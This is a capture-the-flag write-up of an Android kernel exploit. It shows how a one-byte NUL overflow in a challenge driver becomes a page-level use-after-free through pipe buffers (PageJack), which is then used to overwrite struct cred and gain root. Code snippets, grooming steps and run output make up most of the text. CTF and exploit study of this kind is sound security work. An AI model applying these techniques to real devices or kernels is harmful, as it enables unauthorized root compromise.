TL;DR

A one-byte off-by-one NUL in an Android kernel driver is leveraged into a page-level UAF and then into root via a struct cred overwrite (PageJack). No infoleak, no kernel address. Validated on the local QEMU image and ported to a Corellium device.

Target : Linux 5.15.41 arm64, /dev/kern-net
Local  : QEMU, nokaslr, uid mhl=1000
Device : Corellium (Android ranchu), KASLR on, SELinux enforcing, uid shell=2000
Flag   : MHL{big_things_have_small_beginnings}

Vulnerability

The driver’s LOAD_MODEL_DATA ioctl copies a fixed 128-byte structure from userland into a kernel buffer, then strcpys the description field:

struct model_metadata {        // sizeof == 128
    uint32_t framework_type;   // 0x00
    uint16_t model_version;    // 0x04
    uint16_t precision_bits;   // 0x06
    uint32_t input_shape[3];   // 0x08
    uint32_t output_size;      // 0x14
    uint64_t weight_checksum;  // 0x18
    char     model_desc[96];   // 0x20 .. 0x80
};
mdata = kmalloc(128, GFP_KERNEL_ACCOUNT);   // -> kmalloc-cg-128
strcpy(mdata->model_desc, user->model_desc);

model_desc is 96 bytes and ends exactly at offset 128. Supplying 96 non-NUL characters makes strcpy write the 96 bytes plus a terminating \0 at offset 128, a single NUL one byte past the object, onto byte 0 of the next cg-128 slot. The _ACCOUNT flag routes the allocation into the accounted kmalloc-cg-* caches.

Relevant kernel configuration:

  • SLAB_FREELIST_RANDOM and SLAB_FREELIST_HARDENED enabled (randomized object order, obfuscated freelist pointers).
  • VMAP_STACK enabled (kernel stacks are vmalloc’d).
  • INIT_ON_ALLOC / INIT_ON_FREE disabled.
  • KASLR enabled but irrelevant: the exploit needs no infoleak.
  • System V IPC disabled on Android (msgget returns ENOSYS), which rules out the classic msg_msg route.

The single NUL at offset 0 of a neighbour is too weak to corrupt a msg_msg usefully inside cg-128, so we target a page instead of an object.

Target object: cross-page onto a pipe_buffer array

A resized pipe is backed by an array of pipe_buffer structs:

struct pipe_buffer {           // sizeof = 40 B
    struct page *page;         // offset 0
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

After F_SETPIPE_SZ(2*PAGE) the array is 2 * 40 = 80 bytes and lands in kmalloc-cg-96. Separately, every write into the pipe allocates a dedicated 4 KiB data page (alloc_page, unmovable), whose pipe_buffer[0].page holds the only reference.

A cg-128 slab page holds 4096 / 128 = 32 objects. The off-by-one NUL lands at offset +128 of the mdata object, i.e. byte 0 of the next object. For objects 0..30 that next object is in the same page (same cache, useless). For object 31 (offset 0xf80), model_desc ends at 0xf80 + 0x20 + 96 = 0x1000, byte 0 of the neighbouring page. A slab page belongs to a single cache, but two pages of different caches can be physically adjacent: the buddy allocator can place a cg-128 page right before a cg-96 page. We therefore groom so that a cg-128 page whose mdata is the last object is physically followed by a pipe_buffer array page. The NUL then hits byte 0 of that page, the LSB of pipe_buffer[0].page.

off-by-one NUL in gdb: 96 ‘A’ then the NUL on the next object

cross-page NUL

PageJack primitive

The kernel keeps a struct page descriptor for every physical page in a flat array (vmemmap):

PFN N  ->  vmemmap[N]  @ vmemmap_base + N * 0x40

Since sizeof(struct page) == 0x40, every valid struct page * has one of {0x00, 0x40, 0x80, 0xC0} as its low byte. Clearing that low byte to 0x00 (ptr &= ~0xff) rounds the pointer down to a 0x100 boundary, i.e. pfn &= ~3:

original LSB net shift target
0x00 0 no-op
0x40 -0x40 PFN - 1
0x80 -0x80 PFN - 2
0xC0 -0xC0 PFN - 3

In three cases out of four, pipe_buffer.page is shifted onto a different struct page, describing a different physical page. With a dense pipe spray those pages have consecutive PFNs, so the shifted pointer lands on a neighbouring pipe’s data page. Two pipes (call them C and V) now reference the same page P, and P’s refcount is still 1: the NUL rewrote a pointer, it never called get_page.

PageJack

The pipe write primitive

Each pipe is given a full-page marker: a 4 KiB write where every 4-byte word is the pipe index. Reading a pipe returns the marker of whatever page its pipe_buffer[0].page currently points at, which makes the overlap detectable entirely in userland.

To write into the dangling page later, the exploit uses tmp_page. When a pipe buffer is fully drained, anon_pipe_buf_release caches its page into pipe->tmp_page if page_count(page) == 1 (true for a slab page) instead of freeing it. The next write() reuses tmp_page as a fresh buffer at offset 0 and copies into the page. Note that the overlap detection (Step 3) reads 4 bytes from pipe C, leaving its buffer at offset = 4: the read view is therefore shifted by 4 bytes from the physical page, while the tmp_page write restarts at physical offset 0, exactly where the slab objects begin (0, 192, 384, …).

cred_jar and the buddy allocator

struct cred is allocated from a dedicated cred_jar cache. Slab caches are isolated at the slab layer but share the same buddy allocator, so a page returned to buddy by a cg-* cache can be reissued to cred_jar on its next refill.

struct cred on Linux 5.15 arm64 (verified at the gdb stub):

0x00  atomic_t usage        (4 bytes, NOT atomic_long here)
0x04  kuid_t uid
0x08  kgid_t gid
0x0c  suid    0x10 sgid
0x14  euid    0x18 egid
0x1c  fsuid   0x20 fsgid
0x24  securebits
0x28  cap_inheritable   0x30 cap_permitted
0x38  cap_effective     0x40 cap_bset    0x48 cap_ambient

cred_jar geometry: order-0, object size 192, so a 4 KiB page hosts 21 cred slots, with cpu_partial = 30, min_partial = 5.

Important Android detail: setting uid 0 is not enough. Without CAP_DAC_OVERRIDE in cap_effective, opening the root-owned flag returns EACCES. The overwrite must also fill the capability sets.

Reclaiming the page: the setuid storm

The textbook reclaim (a setuid loop to drain the freelist, then fork) is unreliable on this target, for two measured reasons:

  1. cred_jar keeps a reservoir (cpu_partial = 30, min_partial = 5), so a cred allocation almost always finds a free slot and does not force a fresh slab onto P. /proc/slabinfo cannot observe the per-cpu freelist, so the drain target is not observable.
  2. fork/clone does not help: besides the cred it performs zero-filled order-0 allocations (COW page tables for fork, faulted stack pages for clone) that consume the pcp-hot page P and zero it. Combined with the reservoir, the cred lands in a free slot elsewhere while P is taken by one of those zeroing allocations. Waking workers by writing into a pipe fails for the same reason: the write allocates a pipe data page that grabs P.

The fix is a storm of pure cred allocations with no parasitic allocation in the post-free window:

  1. fork 256 helpers before the spray, so they do not inherit the spray pipe fds (their stacks and page tables are allocated well before the UAF). Each helper pins to CPU 0 and blocks on a control pipe.
  2. After close(V), wake them by closing the control pipe’s write end. The blocked read returns EOF, which allocates nothing.
  3. Each helper calls setuid(getuid()). That is prepare_creds, a pure cred allocation with no preceding stack or page-table allocation. In volume the storm crosses the slab boundary, a fresh slab is born on P, and fills with live creds. We observe P full: 21 cred objects, 8 id fields each = 168 words equal to our uid.

free and reclaim

Exploitation

The exploit is a chain of small functions:

int main(void) {
    setup();                              // open device, pipes, rlimit, shared claim flag
    fork_helpers();                       // 256 setuid helpers, BEFORE the spray
    pin_cpu0();
    int n = spray_pipes();                // pipe_buffer arrays + a marked page each
    punch_holes(n);                       // free every other pipe
    int C, V;
    if (!pagejack(n, &C, &V)) return 1;   // poison until an alias is found
    page_uaf(V);                          // close(V): put_page(P) 1 -> 0
    char *page = calloc(1, PG);
    int hit = reclaim_cred_jar(C, page);  // setuid storm, then read P back
    if (!hit) { pause(); return 1; }
    overwrite_creds(C, page);             // patch every cred on P (uid 0 + caps)
    win();                                // wake helpers; a rooted one prints the flag
    pause();                              // never close pipe C (no double put_page on P)
}

setup() raises RLIMIT_NOFILE (each pipe uses two fds) and pin_cpu0() pins to CPU 0 (per-cpu slab/pcp locality). The rest is detailed below.

Step 1: spray_pipes() (pipe arrays + full-page markers)

for (n = 0; n < 4096; n++) {
    pipe(pp[n]);
    fcntl(pp[n][1], F_SETPIPE_SZ, 2*PG);
    for (k = 0; k < PG/4; k++) ((int*)pg)[k] = n;   // marker = index
    write(pp[n][1], pg, PG);
}

Step 2: punch_holes() (checkerboard)

for (i = 0; i < n; i += 2) { close(pp[i][0]); close(pp[i][1]); pp[i][0] = -1; }

Freeing one in two keeps every freed page bordered by survivors, so an mdata landing at the end of its slab page overflows into a pipe_buffer page.

Step 3: pagejack() (poison and locate the overlap)

while (np < 3072 && C < 0) {
    for (i = 0; i < 128; i++) knet_poison();           // mdata, NUL at +128
    np += 128;
    for (i = 1; i < n; i += 2) {                        // userland detection
        int v = -1;
        if (read(pp[i][0], &v, 4) == 4 && v != i && (v & 1) && pp[v][0] >= 0) {
            C = i; V = v; break;                        // C reads V's marker
        }
    }
}

C is the corrupted pipe (its .page was shifted onto V’s page P); V is the legitimate owner. The partial read leaves the buffer alive, so P is not released.

Step 4: page_uaf() (free the shared page)

close(pp[V][0]); close(pp[V][1]);   // put_page(P): refcount 1 -> 0

P returns to buddy while pipe C still points at it: page-level UAF.

Step 5: reclaim_cred_jar() (the setuid storm)

close(ctl[1]);        // EOF wakes the 256 pre-forked helpers
usleep(150*1000);     // each helper: setuid(getuid()) -> fresh cred_jar slab on P

Step 6: overwrite_creds() (read P and overwrite every cred)

while ((r = read(pp[C][0], t+pos, PG-pos)) > 0) pos += r;   // drain -> tmp_page=P
// rebuild the page (preserve each cred's kernel pointers), patch every cred:
for (m = 4; m < PG; m++) wb[m] = t[m-4];                    // read view is +4
for (base = 0; base+176 <= PG; base += 192) {
    *(int*)(wb+base) = 0x4000;          // usage (large, never 0)
    memset(wb+base+0x04, 0, 0x20);      // uid..fsgid = 0
    memset(wb+base+0x28, 0xff, 0x20);   // caps inherit/perm/eff/bset = full
}
write(pp[C][1], wb, PG);                // tmp_page == P -> rewrite the page

cred overwrite

Step 7: win() (read the flag once)

close(ctl2[1]);   // second EOF: any helper whose live cred is on P is now root

Each rooted helper (uid 0 + full caps) can open /data/vendor/secret/flag.txt, but only the first one reports: it claims a shared flag with __sync_bool_compare_and_swap(claimed, 0, 1) and writes the flag back to the parent through a result pipe, so the flag is printed exactly once. The parent must not exit: closing pipe C would call put_page on a page now owned by cred_jar and oops the kernel.

[+] /dev/kern-net opened
[+] 256 setuid helpers pre-forked
[+] sprayed 4096 pipes
[+] checkerboard holes punched
[+] PageJack: pipe 3879 aliases pipe 3877's page P
[+] page UAF: P freed, pipe C dangling
[+] cred_jar reclaim: P is a cred page (168 uid fields)
[+] every cred on P overwritten (uid 0 + full caps)
[+] ROOT  FLAG = MHL{big_things_have_small_beginnings}

Tuning rationale

Parameter Value Reason
model_desc 96 ‘A’ Forces strcpy to write the NUL at offset 128, byte 0 of the neighbour.
Vulnerable slot last of its page Only object 31 sends the NUL across the page boundary into a different cache.
Free step 1 in 2 Keeps freed pages bordered by survivors so overflows hit a pipe_buffer.
OOB byte 0x00 Keeps struct page * aligned to 0x40; pfn &= ~3 lands on a neighbour.
Helpers 256, pre-forked Pure setuid cred allocations with no zeroing alloc to steal P.
Wake close (EOF) Writing to a pipe would allocate a page that grabs P.
usage 0x4000 Large and non-zero, so the patched cred is never freed.
Overwrite whole page + caps Patches all 21 creds (any may be live) and adds CAP_DAC_OVERRIDE.
Closing pipe C never Releasing it would put_page a cred_jar page.

References

  • PageJack, Black Hat USA 2024 by Qian: page-level UAF technique.
  • Reviving exploits against cred_struct, willsroot: https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html
  • LACTF 2025 “messenger” writeup (same PageJack + cred_jar technique on a 3-byte OOB), kiperz.dev.
  • corCTF 2025 “corphone” (Android pipe page-UAF to PTE hijack / SELinux off), u1f383.github.io.